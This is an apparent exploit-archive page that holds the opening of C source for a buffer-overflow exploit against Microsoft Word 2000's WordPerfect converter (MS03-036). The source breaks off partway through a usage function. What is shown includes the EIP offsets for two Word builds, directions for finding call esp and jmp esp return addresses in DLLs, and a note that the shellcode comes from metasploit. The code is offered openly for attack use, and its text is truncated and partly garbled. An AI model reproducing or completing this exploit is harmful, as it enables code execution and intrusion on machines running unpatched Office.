Microsoft WordPerfect Document Converter Exploit (MS03-036)

    
 
* word.cpp + findhex.cpp (ZIP) *
/********************************************************************************/
/* Microsoft WordPerfect Document Converter Buffer Overflow Exploit MS03-036    */
/*                                                                              */
/* Exploit with several targets                                                 */
/*                                                                              */
/* Find your own return address with :                                          */
/*     findhex dllname FF D4 (call esp)                                         */
/*     findhex dllname FF E4 (jmp esp)                                          */
/*                                                                              */
/* Credits :                                                                    */
/* vulnerability : Yuji "The Ninja" Ukai                                        */
/* findhex : Jason Jordan                                                       */
/* sk scan-associates.net                                                       */
/* shellcode : metasploit                                                       */
/* exploit : valgasu - RstAck                                                   */
/*                                                                              */
/********************************************************************************/


#include
#include
#include
#include
#pragma comment(lib,"ws2_32")

/* eip offset for Word 2000 9.0.2812 */
#define EIP_OFFSET 1359

/* eip offset for Word 2000 9.0.4462 SR1 */
//#define EIP_OFFSET 1343


void usage(char *name)
{
    printf("\n-- --\n");
    printf("-- WordPerfect Document Converter Exploit --\n");
    printf("-- --\n\n");
    printf("Usage: %s

                              


All rights reserved © 2002-2004 K-OTiK Security
